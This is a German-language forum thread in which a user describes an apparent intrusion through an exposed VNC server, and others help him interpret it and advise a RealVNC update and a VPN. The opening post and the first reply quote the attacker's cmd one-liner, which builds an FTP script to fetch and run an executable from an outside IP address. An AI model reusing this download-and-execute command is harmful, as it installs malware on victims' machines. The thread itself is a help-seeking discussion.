Sicherheitslücke ???

  • #1
S

schydhei

Mitglied
Themenersteller
Dabei seit
04.11.2007
Beiträge
5
Reaktionspunkte
0
Hallo,
ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine Firewall (extern). Unter anderem habe ich VNC installiert, damit ich ich von draußen auf mein Rechner kann. Das Ganze natürlich Passwort geschützt. Die Anwendung habe ich auch in der Firewall konfiguriert.
Über Nacht habe ich meinen Rechner laufen lassen. Und siehe da irgendwas hat mein Ausführen geöffnet. Das ganze mehrfach mit folgendem Inhalt.
cmd /c echo open 90.128.78.22 3992 >> i &echo user mmokgp mmokgp >> i &echo get msoft42714.exe >> i &echo quit >> i &ftp -nv -s:i &msoft42714.exe &exit
Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054)) oder Connections: accepted: 90.128.78.22::7896

Wer hat da was gemacht??? Fühle mich im Moment sehr ausspioniert !!!!

Hat jemand eine Ahnung ????

Gruß
Heiko
 
  • #2
Als erstes würde ich mal nachsehen, ob ich eine msoft42714.exe auf meinem Rechner finde.
Wer immer auf Deinem Rechner war, hat eine Datei mit folgendem Inhalt angelegt:
Code: 
open 90.128.78.22 3992 
user mmokgp mmokgp 
get msoft42714.exe 
quit
Und diese per FTP ausführen lassen.
Die Datei i sollte unter C:\Dokumente und Einstellungen\Benutzername\ liegen. Diese wäre auch zu löschen.
Ansonsten würde ich sagen, konnte er alles mit Deinem Rechner machen, was er wollte.
IMHO wirst Du es nie erfahren.

Eddie
 
  • #3
:'( Wie verdammt hat er das geschafft???? :tickedoff:

Für was habe ich denn eine Firewall. Das einzige was ich mir vorstelölen kann, wäre der Weg über VNC. Der ist aber Passwortgeschützt.

Verdammt........

Gruß
Heiko
 
  • #4
Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054)) oder Connections: accepted: 90.128.78.22::7896
Zum Vergrößern anklicken....
Hier hast Du die Antwort, wie er das geschafft hat.
VNC ohne VPN zu nutzen ist schon sehr fahrlässig.

Eddie
 
  • #5
Das würde ja bedeuten, das er das Passwort geknackkt hat, oder gibt es andere Möglichkeiten über VNC reinzukommen.

Gruß
 
  • #6
Möglich ist Vieles.
Informier Dich doch mal beim Anbieter Deiner VNC Lösung über Updates.
Vielleicht war auch einfach das Passwort zu schlecht gewählt.

Eddie
 
  • #7
OK, ich bin ja lernfähig... Daraus habe ich bestimmt gelernt. Warscheinlich werde ich nicht herrausfinden wie er ohne Passwort auf mein Rechner zugreifen konnte.

Über VPN einen Tunnel aufzubauen wäre mit Sicherheit sicherer. Das bedeutet aber doch , das ich von jedem Rechner aus von dem ich auf den Rechner zuhause zugreifen möchte eine Software installieren muss. Also das müsste ich mir mal genauer erklären lassen. Hat da jemand mal Zeit und mir erklären könnte wie ich sowas mit welcher Software aufsetze? :-\

Gruß
Heiko[br][br]Erstellt am: 04.11.07 um 19:02:26
[br]
Eddie schrieb:
Möglich ist Vieles.
Informier Dich doch mal beim Anbieter Deiner VNC Lösung über Updates.
Vielleicht war auch einfach das Passwort zu schlecht gewählt.

Eddie
Zum Vergrößern anklicken....

Das Passwort besteht aus Groß und Kleinschreibung, verbunden mit einer Zahl und hat über 10Zeichen. Bei Ebay z.B. wir das Passwort als sehr Sicher gekennzeichnet.

Gruß
Heiko
 
  • #9
Eddie schrieb:
Du setzt nicht zufällig RealVNC ein?

Alternativ mal googlen, ob bei Deiner VNC Version Sicherheitslücken bekannt sind.

Eddie
Zum Vergrößern anklicken....

:tickedoff: :danke1: :T

Toll genau die Version habe ich...... Man kann sich einfach auf nichts mehr verlassen.....

Prima,den Tip werde ich direkt verwenden......

Update erfolgt sofort, weiterhin werde ich das mit dem VPN Tunnel in Angriff nehmen.....

Gruß
und danke.....
 
Thema:

Sicherheitslücke ???

ANGEBOTE & SPONSOREN

Neueste Themen

Statistik des Forums

Themen
113.840
Beiträge
707.963
Mitglieder
51.494
Neuestes Mitglied
Flensburg45
Oben